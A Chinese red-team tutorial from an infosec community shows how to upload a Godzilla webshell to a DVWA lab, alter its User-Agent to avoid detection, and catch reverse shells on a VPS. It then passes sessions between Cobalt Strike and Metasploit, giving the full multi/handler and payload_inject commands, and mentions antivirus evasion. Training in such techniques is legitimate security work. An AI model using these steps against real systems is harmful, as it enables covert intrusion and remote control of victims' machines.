webshell流量隐蔽CS和MSF联动
文章来源|MS08067 内网安全知识星球
本文作者:BlackCat(Ms08067内网安全小组成员)
内网纵横四海 认准Ms08067
环境:
Windows: 192.168.93.3
VPS:x.x.x.x
⼯具:CobaltStrike4.1、MSF、哥斯拉v2.92
实验场景DVWA靶场,通过靶场的上传漏洞位置,上传webshell
然后⽤冰蝎或者其他webshell⼯具连接:
冰蝎下载地址:
https://github.com/rebeyond/Behinder/releases/tag/Behinder_v3.0_Beta_6
我这⾥⽤的上阶段⽐较⽕的哥斯拉,在哥斯拉安装之前,你需要安装jdk1.8的环境。双击Godzilla.jar打开,此时会在同⽬录下⽣成data.db数据库存放数据,同时它⽀持流量加密和修改特征,可以⼀定程度上防⽌被安服设备发现。同时可以⾃⽣成payload,
哥斯拉下载地址:⽬前最新的版本为V2.92
https://github.com/BeichenDream/Godzilla/releases/tag/v2.92-godzilla
个⼈感觉唯⼀缺点就是⻚⾯有点丑。
既然说了可以隐藏特征,那么这⾥我们就伪造⼀下特征:
⾸先wireshark抓包看下 未作修改的数据包是什么样⼦:
先⽣成⼀个payload:点击. ⻚⾯ -- 管理 -- ⽣成
webs hell有两种加密规则,Raw or Base64 加密
Raw:Raw是将加密后的数据直接发送或者输出
Base64:Base64是将加密后的数据再进⾏Base64编码
然后选择pass是连接密码,payload类型 ,⼀共是三种类型,
这⾥我的webshell⽂件是:1.php。
通过DVWA靶场上传到本地,然后链接shell ,⾥⾯参数⼀定要和我们创建的⼀样。
然后我们测试连接,成功后添加就⾏,
进⼊到操作模式,在命令执⾏处执⾏⼀条命令:dir,同时wireshark开启抓包
然后就是查看包内容:没更改之前是这样的
这⾥⼀些安服设备都会过滤 User-agent(简称UA),所以我们这⾥要根据对⽅的⽹络环境去修改:
添加⽬标处也可以更改,再次抓包发现成功 UA成功修改了。
⾄此webshell⽅⾯基本就不需要我们再去配置什么了,如果为了保险起⻅可以在对webshell进⾏⼀定的隐蔽。
接下来就是CS、MSF上线。
这⾥他有⾃带的反弹shell⼯具 ;先尝试能否成功,打开我们的VPS 机的MSF 按照他的配置进⾏配置 ,然后 run 开始监听 10086端⼝观测 VPS动态,发现成功反弹shell。
这⾥ MSF已经上线,我们现在要让CS 也上线,
这⾥发现⼀个问题,脚本shell的权限很不稳,MSF权限经常会丢失,所以还是建议直接上传CS⻢或者通过其他⽅式上线CS。这⾥上传CS⻢⽅式,实战中注意免杀。
通过webshell⼯具的⽂件上传到本地机器⽬录。然后运⾏上线直接管理员权限,都省着我提权了,这⾥推荐⼏个提权CS插件:
https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts
https://github.com/zer0yu/Awesome-CobaltStrike
尝试把CS会话在MSF端上线
当CobaltStrike获得了⼀个上线机器,想把这个⽬标传给Metasploit中的meterpreter,获得⼀个session进⾏控制。在Metasploit执⾏以下命令:
MSF:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost vps:IP
set lport 10010
exploit -j #-j 后台监听 可不选
CS:
⾸先有⼀个已经建⽴会话的shell,然后添加监听器Listener,HOST和PORT填写msf监听的地址IP:x.x.x.x,PORT:10010
选择我们刚才建⽴的 listener ,然后等待MSF端,过程⼤概1-2分钟
MSF会话反弹给CS:
这⾥只是为了实验,所以就⽤这个CS反弹来的shell,实际中请结合具体内⽹情况。
CS适合外围突破,MSF适合内⽹横向,当然也看个⼈喜好
1、⾸先把msf上获取到的meterpreter挂在后台运⾏
Background #就是返回的意思
CS :创建⼀个监听,payload⽅式要与MSF相同即可。
MSF:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set disablepayloadhandler true
#默认情况下,payload_inject执⾏之后会在本地产⽣⼀个新的handler,由于我们已经有了⼀个,所以
不需要在产⽣⼀个,所以这⾥我们设置为true
set lhost x.x.x.x #cobaltstrike监听的ip
set lport 10001 #cobaltstrike监听的端⼝
set session 1 #这⾥是获得的session的id
exploit
然后正常情况下 等待上线即可,我这⾥不做演示了,因为 VPS卡死了。。。
扫描下方二维码加入星球学习
加入后会邀请你进入内部微信群,内部微信群永久有效!
目前40000+人已关注加入我们
webshell流量隐蔽CS和MSF联动相关推荐
- CS + MSF 联动
CS + MSF 联动 首先cs上已经成功上线: Kali查看IP地址: Msf上操作: use exploit/multi/handler set payload windows/meterpret ...
- 遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...
# zTian.red:绕过卡巴斯基.360安全卫士.Windows Defender动态执行CS.MSF命令... 测试目标:Windows Defender.卡巴斯基.360安全卫士极速版 系统环 ...
- apache日志 waf_WAF对WebShell流量检测的性能分析
最近在一次授权渗透测试中遇到了一个棘手的场景,万能的队友已经找到了后台上传点,并传了小马然后开心地用antsword进行连接,但是由于明文传输很快被waf感知,并引起了管理员的注意,很快我们的马被清了 ...
- cs与msf的联合使用
cs和msf在内网渗透中的作用 cs主要用于,反弹会话,提权,内网渗透防线,但cs的exp,提权方面没有msf强,但cs以操作简单,图形化界面,比msf强,使用两种工具结合可以很好的完成渗透测试工作, ...
- webshell流量一键解密——webshellDecrypt
webshell流量一键解密--webshellDecrypt 访问地址 主要功能 一.常见webshell流量一键解密: 二.AES专项解密: 三.各类单项解密: 四.自定义js解密: 五.复制剪贴 ...
- cs和msf配合进行内网的操作
cs中直接添加一个socks代理 msf中的操作相应的cs中socks的代理端口,然后利用msf对内网进一步的探测 setg Proxies socks4:xxx.xxx.xxx.xxx:44803
- cs和msf实现内网横向移动3
注:上传通过哈希攻击拿到172.16.1.123的权限,也就是说成功跳转到172.16这个网段,这次通过172.16.1.123拿到172.16.1.119的权限 一.通过172.16.1.123确定 ...
- 红队攻防之从边界突破到漫游内网(无cs和msf)
前言 网络安全的本质:懂进攻,知防守,先正向,后逆向. 本篇文章目录 网络拓扑图: 本次红队攻防实战所需绘制的拓扑图如下: 边界突破 访问网站: http://xxx.xxx.xxx/?id=1 首页 ...
- frp内网穿透教程2022最新(含内网ssh配置与msf联动配置)
1.frp简介 frp是一个高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http,https等协议类型,并且web服务支持根据域名进行路由转发. 1. ...
- Cobalt Strike与Metasploit Framewor联动(会话传递)功能演示
一.前言 Cobalt Strike 是一个为模拟对手和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁.CS集成了很多功能,这些功能为渗透测试提供了便利的操作.同时CS还支持丰富的插件, ...
最新文章
- linux mysql软件_「Linux」 - 常用软件安装-MySql
- java jtable刷新_使用Swing timer实现Jtable数据定时更新
- centos7修改ip地址命令_CentOS7 安装 httpd 服务
- java过滤器经典案例_JAVA语言基础的经典案例:猜字母游戏
- Android内部存储与外部存储解析
- C/C++:Windows编程—Windows RPC 传递自定义数据类型、自定义数据类型数组、指针数组
- 鼠标悬停在li标签上时显示一个弹框_HTML标签——列表标签
- 文末福利 | 学习如何构建行业知识图谱(以医疗行业为例)
- BZOJ4197: [Noi2015]寿司晚宴
- 用foxmail绑定邮箱提示用户名或密码错误
- 翻译--CenterNet-将目标看作点
- ARCore从零到一 (1) 搭建开发环境
- 基于snowfall的玫瑰花瓣飘落效果
- Java类管理机制——包的详解
- JavaMail 邮件附件名乱码问题
- Android图片上传的两种方式
- 用英语表达“谢谢”,thank you,thank you very much的其他多种方式
- Linux安装库时安装源错误,linux环境下golang安装第三方库的时候出错的决办法
- 自媒体短视频搬运如何伪原创上热门!老司机教你伪原创短视频的做法
- 解决Maven项目创建太慢的问题